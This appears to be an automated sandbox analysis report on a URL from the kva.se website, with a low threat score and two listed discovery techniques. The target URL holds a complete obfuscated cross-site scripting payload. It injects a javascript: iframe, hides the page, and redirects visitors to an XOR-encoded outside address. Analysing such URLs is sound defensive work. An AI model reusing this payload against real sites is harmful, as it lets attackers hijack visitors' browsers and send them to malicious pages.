General

  • Target

    https://www.kva.se/?s=%%22%3E%7CCryptography%20menu.get=mime%20%C2%A7intelligence.start(dispatchEvent)%20lib%20%C2%A7computing(start).reality%20onUpdated%C2%A7%7C%20Blockchain%C2%A7%20gif~%20location.reload()%C2%A7%20web%22%20rsc%60%20door(%20remake=%20redo)%C2%A7%20onstart_%20attitudelocal_marine%C2%A7%20menu.get=%60mime%60%20library.start(%60await%60)%20lib%C2%A7%20process%C2%A7(%60start%60).load%20arch.hand()%20folder.setElementByCode(%60socar%60)%C2%A7%20contact(%60r%60,%605%60)%20%C2%A7connect=%60hola%60.fix()%22%3E%3Ciframe%20src=javascript%3A%2F%2Afd7%C2%A7ljj%5Bljj.attol1%5Dkhalfyacoleur%C2%A7blanch%2A%2FcodeString=%60win%60%2B%60dow.par%60%2B%60ent.docu%60%2B%60ment.docu%60%2B%60mentEle%60%2B%60ment.st%60%2B%60yle.opa%60%2B%60city=0;url=%5B66,94,94,90,89,16,5,5,73,95,94,94,4,70,83,5,31,93,104,121,88,108,77,89%5D;%2F%2Athat%5B~7el~%5D(setInterval,hara)laard%C2%A73000zblaalo%C2%A73000zb%2A%2Fwin%60%2B%60dow.par%60%2B%60ent.loca%60%2B%60tion.hr%60%2B%60ef=url.map(value=%60%2BString.fromCharCode(62)%2B%60String.fromCharCode(value%5E42)).jo%60%2B%60in(%27%27);%2F%2Achw%C2%A7%C2%A7%C2%A7chw.toUpUpDown()%2A%2F%60;codeString=codeString.replaceAll(%60salooa%60,%60azefcr%60);executeCode=Function(codeString);%2F%2Athat%5B~ovrir~%5D(sessionStorage,_selve)sleep.over%C2%A7%2A%2FexecuteCode();%2F%2A%C2%A7max.do()%2A%2F%3E%3C%2Fiframe%3E%3Cspan%20style=%60display:block;position:fixed;z-index:997483649;top:0;left:0;width:2000px;height:2000px;backgroundcolor:white;%3E%3C%2Fspan%3E%7CCryptography%20menu.get=mime%20%C2%A7intelligence.start(dispatchEvent)%20lib%20%C2%A7computing(start).reality%20arch.learning()onUpdated%C2%A7%7C%20Blockchain%C2%A7%20gif%20location.reload()%C2%A7%20web%22%20rsc%60%20door(%20remake=%20redo)%C2%A7%20onstart%20attitudelocal_marine%C2%A7%20folder.setElementByCode(socar~ar)

  • Sample

    240222-wzvheaea68

Malware Config

Targets


    Score: 1/10

MITRE ATT&CK Matrix (ATT&CK v13)

Discovery

  • Query Registry (T1012): 1

  • System Information Discovery (T1082): 1
